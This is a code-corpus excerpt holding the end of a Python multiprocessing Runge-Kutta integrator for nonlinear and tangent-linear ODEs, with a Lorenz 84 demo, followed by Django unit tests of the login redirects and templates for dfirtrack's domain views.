Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
n_dim: int
Dynamical system dimension.
n_traj: int
The number of trajectories (initial conditions) of the non-linear ODEs computed at the last integration
performed by the integrator.
n_tgtraj: int
The number of trajectories (initial conditions) of the linear ODEs computed at the last integration
performed by the integrator.
n_records: int
The number of saved states of the last integration performed by the integrator.
ic: ~numpy.ndarray
Store the integrator non-linear ODEs initial conditions.
tg_ic: ~numpy.ndarray
Store the integrator linear ODEs initial conditions.
time: ~numpy.ndarray
The time at which the state of the system was saved. Array of shape (`n_records`,).
recorded_traj: ~numpy.ndarray
Saved states of the ODEs. 3D array of shape (:attr:`n_traj`, :attr:`n_dim`, :attr:`n_records`).
recorded_fmatrix: ~numpy.ndarray
Saved states of the linear ODEs. 4D array of shape (:attr:`n_traj`, :attr:`n_tg_traj`, :attr:`n_dim`, :attr:`n_records`).
func: callable
Last function :math:`\\boldsymbol{f}` used by the integrator to integrate.
func_jac: callable
Last Jacobian matrix function :math:`\\boldsymbol{J}` used by the integrator to integrate.
"""
def __init__(self, num_threads=None, b=None, c=None, a=None, number_of_dimensions=None):
if num_threads is None:
self.num_threads = multiprocessing.cpu_count()
else:
self.num_threads = num_threads
# Default is RK4
if a is None and b is None and c is None:
self.c = np.array([0., 0.5, 0.5, 1.])
self.b = np.array([1./6, 1./3, 1./3, 1./6])
self.a = np.zeros((len(self.c), len(self.b)))
self.a[1, 0] = 0.5
self.a[2, 1] = 0.5
self.a[3, 2] = 1.
else:
self.a = a
self.b = b
self.c = c
self.ic = None
self.tg_ic = None
self.time = None
self.recorded_traj = None
self.recorded_fmatrix = None
self.n_traj = 0
self.n_tgtraj = 0
self.n_dim = number_of_dimensions
self.n_records = 0
self._write_steps = 0
self._time_direction = 1
self._adjoint = False
self._boundary = None
self._inverse = 1.
self.func = None
self.func_jac = None
self._ics_queue = None
self._traj_queue = None
self._processes_list = list()
def terminate(self):
"""Stop the workers (threads) and release the resources of the integrator."""
for process in self._processes_list:
process.terminate()
process.join()
def start(self):
"""Start or restart the workers (threads) of the integrator.
Warnings
--------
If the integrator was not previously terminated, it will be terminated first in the case
of a restart.
"""
self.terminate()
self._processes_list = list()
self._ics_queue = multiprocessing.JoinableQueue()
self._traj_queue = multiprocessing.Queue()
for i in range(self.num_threads):
self._processes_list.append(TglsTrajectoryProcess(i, self.func, self.func_jac, self.b, self.c, self.a,
self._ics_queue, self._traj_queue))
for process in self._processes_list:
process.daemon = True
process.start()
def set_func(self, f, fjac, ic_init=True):
"""Set the `Numba`_-jitted function :math:`\\boldsymbol{f}` and Jacobian matrix function
:math:`\\boldsymbol{\mathrm{J}}` to integrate.
.. _Numba: https://numba.pydata.org/
Parameters
----------
f: callable
The `Numba`_-jitted function :math:`\\boldsymbol{f}`.
Should have the signature ``f(t, x)`` where ``x`` is the state value and ``t`` is the time.
fjac: callable
The `Numba`_-jitted Jacobian matrix function :math:`\\boldsymbol{J}`.
Should have the signature ``J(t, x)`` where ``x`` is the state value and ``t`` is the time.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
Warnings
--------
This function restarts the integrator!
"""
self.func = f
self.func_jac = fjac
if ic_init:
self.ic = None
self.start()
def set_bca(self, b=None, c=None, a=None, ic_init=True):
"""Set the coefficients of the `Runge-Kutta method`_ and restart the integrator. s
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
Parameters
----------
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
c: None or ~numpy.ndarray, optional
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
a: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
"""
if a is not None:
self.a = a
if b is not None:
self.b = b
if c is not None:
self.c = c
if ic_init:
self.ic = None
self.start()
def initialize(self, convergence_time, dt, pert_size=0.01, reconvergence_time=None, forward=True,
number_of_trajectories=1, ic=None, reconverge=None):
"""Initialize the integration on an attractor by running it for a transient time,
For an ensemble of initial conditions, can do the same transient time for each, or the
`convergence_time` for the first one, and a smaller `reconvergence_time` for the subsequent ones.
This results into initial conditions on the attractor, stored in :attr:`ic`.
Parameters
----------
convergence_time: float
Transient time needed to converge to the attractor.
dt: float
Timestep of the transient integration.
pert_size: float, optional
If the reconvergence is activated, size of the perturbation to add to the previous ic to find
the next one. Default to 0.01.
reconvergence_time: None or float, optional
Transient time for the subsequent trajectories after the first long `convergence_time`.
forward: bool, optional
Whether to integrate the ODEs forward or backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
number_of_trajectories: int
Number of initial conditions to find. Default to 1. Inactive if `ic` is provided.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial conditions.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use `number_of_trajectories` random initial conditions. Default to `None`.
reconverge: bool
Whether to use the smaller `reconvergence_time` transient with a perturbation
after the first initial conditions have been computed. If activated, only use the :attr:`num_threads`
first initial conditions of the `ic` argument. Default to `False`.
"""
if reconverge is None:
reconverge = False
if ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
if number_of_trajectories > self.num_threads:
reconverge = True
tmp_ic = np.zeros((number_of_trajectories, i))
tmp_ic[:self.num_threads] = np.random.randn(self.num_threads, i)
else:
tmp_ic = np.random.randn(number_of_trajectories, i)
else:
tmp_ic = ic.copy()
if len(tmp_ic.shape) > 1:
number_of_trajectories = tmp_ic.shape[0]
if reconverge and reconvergence_time is not None:
self.integrate(0., convergence_time, dt, ic=tmp_ic[:self.num_threads], write_steps=0, forward=forward)
t, x, fm = self.get_trajectories()
tmp_ic[:self.num_threads] = x
if number_of_trajectories - self.num_threads > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - self.num_threads
index = self.num_threads
while True:
perturbation = pert_size * np.random.randn(next_len, x.shape[1])
self.integrate(0., reconvergence_time, dt, ic=x[:next_len]+perturbation, write_steps=0, forward=forward)
t, x, fm = self.get_trajectories()
tmp_ic[index:index+next_len] = x
index += next_len
if number_of_trajectories - index > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - index
if next_len <= 0:
break
self.ic = tmp_ic
else:
self.integrate(0., convergence_time, dt, ic=tmp_ic, write_steps=0, forward=forward)
t, x, fm = self.get_trajectories()
self.ic = x
def integrate(self, t0, t, dt, ic=None, tg_ic=None, forward=True, adjoint=False, inverse=False, boundary=None,
write_steps=1):
"""Integrate simultaneously the non-linear and linearized ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
and
.. math :: \dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}
with a specified `Runge-Kutta method`_ and workers.
The function :math:`\\boldsymbol{f}` is the `Numba`_ jitted function stored in :attr:`func`.
The function :math:`\\boldsymbol{J}` is the `Numba`_ jitted function stored in :attr:`func_jac`.
The result of the integration can be obtained afterward by calling :meth:`get_trajectories`.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
.. _fundamental matrix of solutions: https://en.wikipedia.org/wiki/Fundamental_matrix_(linear_differential_equation)
Parameters
----------
t0: float
Initial time of the time integration. Corresponds to the initial condition's `ic` time.
Important if the ODEs are non-autonomous.
t: float
Final time of the time integration. Corresponds to the final condition.
Important if the ODEs are non-autonomous.
dt: float
Timestep of the integration.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial conditions.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use the initial conditions stored in :attr:`ic`.
If then :attr:`ic` is `None`, use a zero initial condition.
Default to `None`.
tg_ic: None or ~numpy.ndarray(float), optional
Initial condition of the linear ODEs
:math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}`. \n
Can be a 1D, a 2D or a 3D array:
* 1D: Provide a single initial condition. This initial condition of the linear ODEs will be the same one used for each
initial condition `ic` of the ODEs :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Two sub-cases:
+ If `tg_ic.shape[0]`=`ic.shape[0]`, assumes that each initial condition `ic[i]` of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`
corresponds to a different initial condition `tg_ic[i]`.
+ Else, assumes and integrates an ensemble of `n_tg_traj` initial conditions of the linear ODEs for each
initial condition of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
* 3D: An array of shape (`n_traj`, `n_tg_traj`, `n_dim`) which provides an ensemble of `n_tg_traj` initial conditions
specific to each of the `n_traj` initial conditions of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
If `None`, use the identity matrix as initial condition, returning the `fundamental matrix of solutions`_ of the
linear ODEs.
Default to `None`.
forward: bool, optional
Whether to integrate the ODEs forward or backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
adjoint: bool, optional
If true, integrate the adjoint linear model :math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}^T(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}`,
else, integrate the tangent model :math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}`.
Integrates the tangent model by default.
inverse: bool, optional
Whether or not to invert the Jacobian matrix
:math:`\\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \\rightarrow \\boldsymbol{\mathrm{J}}^{-1}(t, \\boldsymbol{x})`.
`False` by default.
boundary: None or callable, optional
Allows adding an inhomogeneous term to the linear ODEs:
:math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x} + \Psi(t, \\boldsymbol{x})`.
The boundary :math:`\Psi` should have the same signature as :math:`\\boldsymbol{\mathrm{J}}`, i.e. ``func(t, x)``.
If `None`, don't add anything (homogeneous case). `None` by default.
write_steps: int, optional
Save the state of the integration in memory every `write_steps` steps. The other intermediary
steps are lost. It determines the size of the returned objects. Default is 1.
Set to 0 to return only the final state.
"""
if self.func is None or self.func_jac is None:
print('No function to integrate defined!')
return 0
if ic is None:
if self.ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
self.ic = np.zeros(i)
else:
self.ic = ic
if len(self.ic.shape) == 1:
self.ic = self.ic.reshape((1, -1))
self.n_traj = self.ic.shape[0]
self.n_dim = self.ic.shape[1]
self.time = np.concatenate((np.arange(t0, t, dt), np.full((1,), t)))
self._write_steps = write_steps
if tg_ic is None:
tg_ic = np.eye(self.ic.shape[1])
tg_ic_sav = tg_ic.copy()
if len(tg_ic.shape) == 1:
tg_ic = tg_ic.reshape((1, -1, 1))
ict = tg_ic.copy()
for i in range(self.n_traj-1):
ict = np.concatenate((ict, tg_ic))
self.tg_ic = ict
elif len(tg_ic.shape) == 2:
if tg_ic.shape[0] == self.n_traj:
self.tg_ic = tg_ic[..., np.newaxis]
else:
tg_ic = tg_ic[np.newaxis, ...]
tg_ic = np.swapaxes(tg_ic, 1, 2)
ict = tg_ic.copy()
for i in range(self.n_traj-1):
ict = np.concatenate((ict, tg_ic))
self.tg_ic = ict
elif len(tg_ic.shape) == 3:
if tg_ic.shape[1] != self.n_dim:
self.tg_ic = np.swapaxes(tg_ic, 1, 2)
if forward:
self._time_direction = 1
else:
self._time_direction = -1
self._adjoint = adjoint
if boundary is None:
self._boundary = _zeros_func
else:
self._boundary = boundary
self._inverse = 1.
if inverse:
self._inverse *= -1.
if write_steps == 0:
self.n_records = 1
else:
tot = self.time[::self._write_steps]
self.n_records = len(tot)
if tot[-1] != self.time[-1]:
self.n_records += 1
self.recorded_traj = np.zeros((self.n_traj, self.n_dim, self.n_records))
self.recorded_fmatrix = np.zeros((self.n_traj, self.tg_ic.shape[1], self.tg_ic.shape[2], self.n_records))
for i in range(self.n_traj):
self._ics_queue.put((i, self.time, self.ic[i], self.tg_ic[i], self._time_direction, self._write_steps,
self._adjoint, self._inverse, self._boundary))
self._ics_queue.join()
for i in range(self.n_traj):
args = self._traj_queue.get()
self.recorded_traj[args[0]] = args[1]
self.recorded_fmatrix[args[0]] = args[2]
if len(tg_ic_sav.shape) == 2:
if self.recorded_fmatrix.shape[1:3] != tg_ic_sav.shape:
self.recorded_fmatrix = np.swapaxes(self.recorded_fmatrix, 1, 2)
elif len(tg_ic_sav.shape) == 3:
if tg_ic_sav.shape[1] != self.n_dim:
if self.recorded_fmatrix.shape[:3] != tg_ic_sav.shape:
self.recorded_fmatrix = np.swapaxes(self.recorded_fmatrix, 1, 2)
def get_trajectories(self):
"""Returns the result of the previous integrator integration.
Returns
-------
time, traj, tg_traj: ~numpy.ndarray
The result of the integration:
* `time` is the time at which the state of the system was saved. Array of shape (:attr:`n_records`,).
* `traj` are the saved states. 3D array of shape (:attr:`n_traj`, :attr:`n_dim`, :attr:`n_records`).
If :attr:`n_traj` = 1, a 2D array of shape (:attr:`n_dim`, :attr:`n_records`) is returned instead.
* `tg_traj` are the saved states of the linear ODEs.
Depending on the input initial conditions of both ODEs,
it is at maximum a 4D array of shape
(:attr:`n_traj`, :attr:`n_tg_traj`, :attr:`n_dim`, :attr:`n_records`).
If one of the dimension is 1, it is squeezed.
"""
if self._write_steps > 0:
if self._time_direction == 1:
if self.time[::self._write_steps][-1] == self.time[-1]:
return self.time[::self._write_steps], np.squeeze(self.recorded_traj), \
np.squeeze(self.recorded_fmatrix)
else:
return np.concatenate((self.time[::self._write_steps], np.full((1,), self.time[-1]))), \
np.squeeze(self.recorded_traj), np.squeeze(self.recorded_fmatrix)
else:
rtime = reverse(self.time[::-self._write_steps])
if rtime[0] == self.time[0]:
return rtime, np.squeeze(self.recorded_traj), np.squeeze(self.recorded_fmatrix)
else:
return np.concatenate((np.full((1,), self.time[0]), rtime)), np.squeeze(self.recorded_traj),\
np.squeeze(self.recorded_fmatrix)
else:
return self.time[-1], np.squeeze(self.recorded_traj), np.squeeze(self.recorded_fmatrix)
def get_ic(self):
"""Returns the initial conditions of the non-linear ODEs stored in the integrator.
Returns
-------
~numpy.ndarray
The initial conditions.
"""
return self.ic
def set_ic(self, ic):
"""Direct setter for the integrator's non-linear ODEs initial conditions
Parameters
----------
ic: ~numpy.ndarray(float)
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial conditions.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
"""
self.ic = ic
def get_tg_ic(self):
"""Returns the initial conditions of the linear ODEs stored in the integrator.
Returns
-------
~numpy.ndarray
The initial conditions.
"""
return self.tg_ic
def set_tg_ic(self, tg_ic):
"""Direct setter for the integrator's linear ODEs initial conditions
Parameters
----------
tg_ic: ~numpy.ndarray(float)
Initial condition of the linear ODEs
:math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}`. \n
Can be a 1D, a 2D or a 3D array:
* 1D: Provide a single initial condition. This initial condition of the linear ODEs will be the same one used for each
initial condition `ic` of the ODEs :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Two sub-cases:
+ If `tg_ic.shape[0]`=`ic.shape[0]`, assumes that each initial condition `ic[i]` of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`
corresponds to a different initial condition `tg_ic[i]`.
+ Else, assumes and integrates an ensemble of `n_tg_traj` initial conditions of the linear ODEs for each
initial condition of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
* 3D: An array of shape (`n_traj`, `n_tg_traj`, `n_dim`) which provides an ensemble of `n_tg_traj` initial conditions
specific to each of the `n_traj` initial conditions of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
"""
self.tg_ic = tg_ic
class TglsTrajectoryProcess(multiprocessing.Process):
""":class:`RungeKuttaTglsIntegrator`'s workers class. Allows to multi-thread time integration.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
Parameters
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
b: ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray, optional
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray, optional
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue from which the worker fetches initial-conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
Attributes
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
func_jac: callable
`Numba`_-jitted Jacobian matrix function to integrate assigned to the worker.
b: ~numpy.ndarray
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Vector of coefficients :math:`c_i` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Matrix of coefficients :math:`a_{i,j}` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue from which the worker fetches initial-conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
"""
def __init__(self, processID, func, func_jac, b, c, a, ics_queue, traj_queue):
super().__init__()
self.processID = processID
self.ics_queue = ics_queue
self.traj_queue = traj_queue
self.func = func
self.func_jac = func_jac
self.a = a
self.b = b
self.c = c
def run(self):
"""Main worker computing routine. Perform the time integration with the fetched initial conditons."""
while True:
args = self.ics_queue.get()
recorded_traj, recorded_fmatrix = _integrate_runge_kutta_tgls_jit(self.func, self.func_jac, args[1], args[2][np.newaxis, ...],
args[3][np.newaxis, ...], args[4], args[5],
self.b, self.c, self.a,
args[6], args[7], args[8])
self.traj_queue.put((args[0], recorded_traj, recorded_fmatrix))
self.ics_queue.task_done()
if __name__ == "__main__":
import matplotlib.pyplot as plt
from scipy.integrate import odeint
@njit
def f(t, x):
return - np.array([1., 2., 3.]) * x
def fr(x, t):
return f(t, x)
ic = np.random.randn(6).reshape(2, 3)
integrator = RungeKuttaIntegrator()
integrator.set_func(f)
integrator.integrate(0., 10., 0.01, ic=ic, write_steps=1)
time, r = integrator.get_trajectories()
t = np.arange(0., 10., 0.1)
t = np.concatenate((t[::3], np.full((1,), 10.)))
rl = list()
for i in range(ic.shape[0]):
rl.append(odeint(fr, ic[i], t).T)
plt.figure()
for i in range(ic.shape[0]):
p, = plt.plot(time, r[i, 0])
c = p.get_color()
plt.plot(t, rl[i][0], color=c, ls='--')
for j in range(1, ic.shape[1]):
p, = plt.plot(time, r[i, j], color=c)
plt.plot(t, rl[i][j], color=c, ls='--')
plt.title('Forward')
integrator.integrate(0., 10., 0.01, ic=ic, forward=False, write_steps=1)
timet, rt = integrator.get_trajectories()
rlt = list()
for i in range(ic.shape[0]):
rlt.append(odeint(fr, ic[i], reverse(t)).T)
plt.figure()
for i in range(ic.shape[0]):
p, = plt.plot(timet, rt[i, 0])
c = p.get_color()
plt.plot(t, reverse(rlt[i][0]), color=c, ls='--')
for j in range(1, ic.shape[1]):
p, = plt.plot(timet, rt[i, j], color=c)
plt.plot(t, reverse(rlt[i][j]), color=c, ls='--')
plt.title('Backward')
integrator.integrate(0., 10., 0.01, ic=ic, write_steps=0)
tt, re = integrator.get_trajectories()
print(tt)
print(r[0, :, -1], re[0])
plt.show(block=False)
a = 0.25
F = 16.
G = 3.
b = 6.
@njit
def fL84(t, x):
xx = -x[1] ** 2 - x[2] ** 2 - a * x[0] + a * F
yy = x[0] * x[1] - b * x[0] * x[2] - x[1] + G
zz = b * x[0] * x[1] + x[0] * x[2] - x[2]
return np.array([xx, yy, zz])
@njit
def DfL84(t, x):
return np.array([[ -a , -2. * x[1], -2. * x[2]],
[x[1] - b * x[2], -1. + x[0], -b * x[0]],
[b * x[1] + x[2], b * x[0], -1. + x[0]]])
integrator.set_func(fL84)
integrator.integrate(0., 10000., 0.01, write_steps=0)
tt, traj = integrator.get_trajectories()
    integrator.integrate(0., 20., 0.01, ic=traj, write_steps=10)
    tt, traj = integrator.get_trajectories()
    integrator.integrate(0., 20., 0.01, ic=traj[:, -1], write_steps=10, forward=False)
ttb, trajb = integrator.get_trajectories()
plt.figure()
plt.plot(tt, traj[0])
plt.plot(ttb, trajb[0])
    plt.title('Lorenz 84 - Forward then backward')
    plt.show(block=False)
integrator.integrate(0., 10000., 0.01, write_steps=0)
tt, traj = integrator.get_trajectories()
    integrator.integrate(0., 20., 0.01, ic=traj, write_steps=10, forward=False)
    tt, trajb = integrator.get_trajectories()
    integrator.integrate(0., 20., 0.01, ic=trajb[:, 0], write_steps=10)
ttb, traj = integrator.get_trajectories()
plt.figure()
plt.plot(tt, traj[0])
plt.plot(ttb, trajb[0])
    plt.title('Lorenz 84 - Backward then forward')
    plt.show(block=False)
integrator.terminate()
tgls_integrator = RungeKuttaTglsIntegrator()
tgls_integrator.set_func(fL84, DfL84)
@njit
def tboundary(t, x):
        return np.array([0., x[1], 0.])
ic = np.random.randn(4, 3)
tgls_integrator.initialize(10., 0.01, ic=ic)
tgls_integrator.integrate(0., 20., 0.01, write_steps=10, tg_ic=np.zeros(3), boundary=tboundary)
# x, fm = _integrate_runge_kutta_tgls_jit(fL84, DfL84, tgls_integrator.time, tgls_integrator.ic[0][np .newaxis,...], np.zeros((1,3,1)), 1, 1, tgls_integrator.b, tgls_integrator.c, tgls_integrator.a, False, 1., tboundary)
t, x, fm = tgls_integrator.get_trajectories()
tgls_integrator.terminate()
hexsha: 1691db90f2766019b98b43b0c672eb39be9705bf | size: 7,266 bytes | ext: py | lang: Python
path: dfirtrack_main/tests/domain/test_domain_views.py | repo: blackhatethicalhacking/dfirtrack @ 9c2e13015291f2981d14d63c9683e7c447e91f3a
licenses: ["MIT"] | stars: 4 (2020-03-06T17:37:09Z to 2020-03-17T07:50:55Z) | issues: n/a | forks: 1 (2020-03-06T20:54:52Z)
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Domain
import urllib.parse
class DomainViewTestCase(TestCase):
""" domain view tests """
@classmethod
def setUpTestData(cls):
# create object
Domain.objects.create(domain_name='domain_1')
# create user
test_user = User.objects.create_user(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
def test_domains_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/', safe='')
# get response
response = self.client.get('/domains/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_list_logged_in(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/')
# compare
self.assertEqual(response.status_code, 200)
def test_domains_list_template(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_list.html')
def test_domains_list_get_user_context(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
def test_domains_detail_not_logged_in(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/' + str(domain_1.domain_id), safe='')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_detail_logged_in(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id))
# compare
self.assertEqual(response.status_code, 200)
def test_domains_detail_template(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id))
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_detail.html')
def test_domains_detail_get_user_context(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id))
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
def test_domains_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/add/', safe='')
# get response
response = self.client.get('/domains/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_add_logged_in(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_domains_add_template(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_add.html')
def test_domains_add_get_user_context(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
def test_domains_edit_not_logged_in(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/' + str(domain_1.domain_id) + '/edit/', safe='')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_edit_logged_in(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/')
# compare
self.assertEqual(response.status_code, 200)
def test_domains_edit_template(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_edit.html')
def test_domains_edit_get_user_context(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
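
# Hedged sketch (editor's addition, not part of dfirtrack): the tests above
# repeat the same login-then-GET pattern; a small mixin could factor it out.
class LoggedInClientMixin:
    """Log the shared test user in and return the response for ``url``."""

    def get_logged_in(self, url):
        # credentials match the user created in setUpTestData above
        self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
        return self.client.get(url)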
hexsha: bca7648bb5abba00f5783b0b88a01388e80e830a | size: 24,382 bytes | ext: py | lang: Python
path: FnB_LSTM.py | repo: biolib/deepclip @ 06e0a3c431db76745b6674afabc4d171f19b3eb0
